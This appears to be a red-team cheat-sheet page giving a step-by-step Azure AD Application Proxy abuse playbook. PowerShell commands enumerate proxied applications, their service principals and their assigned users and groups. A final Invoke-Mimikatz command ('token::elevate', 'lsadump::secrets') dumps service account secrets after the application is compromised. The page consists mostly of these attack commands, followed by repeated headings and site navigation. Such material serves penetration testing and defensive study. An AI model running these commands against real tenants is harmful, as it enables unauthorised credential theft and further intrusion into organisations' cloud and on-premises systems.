Application Proxy Abuse

Steps

1) Enumerate Applications with Application Proxy configured

Import-Module .\AzureAD.psd1

Get-AzureADApplication | ForEach-Object {
  try {
      Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectId
      $_.DisplayName
      $_.ObjectId
    }   catch {}
}

2) Get the Service Principal (Use the Application Name)

Get-AzureADServicePrincipal -All $true | Where-Object { $_.DisplayName -eq "<APPLICATION NAME>" }

3) Find Users and Groups Assigned to the Application

. .\Get-ApplicationProxyAssignedUsersAndGroups.ps1

Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <OBJECT ID OF SERVICE PRINCIPAL>

4) Extract Secrets of Service Account: After compromising the application, use Mimikatz to extract secrets

Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'

PreviousApp Service Exploitation and Credentials Extraction NextAutomation Accounts Credentials Extraction

Last updated 5 months ago

hashtagSteps

hashtag1) Enumerate Applications with Application Proxy configured

hashtag2) Get the Service Principal (Use the Application Name)

hashtag3) Find Users and Groups Assigned to the Application

hashtag4) Extract Secrets of Service Account: After compromising the application, use Mimikatz to extract secrets

Steps

1) Enumerate Applications with Application Proxy configured

2) Get the Service Principal (Use the Application Name)

3) Find Users and Groups Assigned to the Application

4) Extract Secrets of Service Account: After compromising the application, use Mimikatz to extract secrets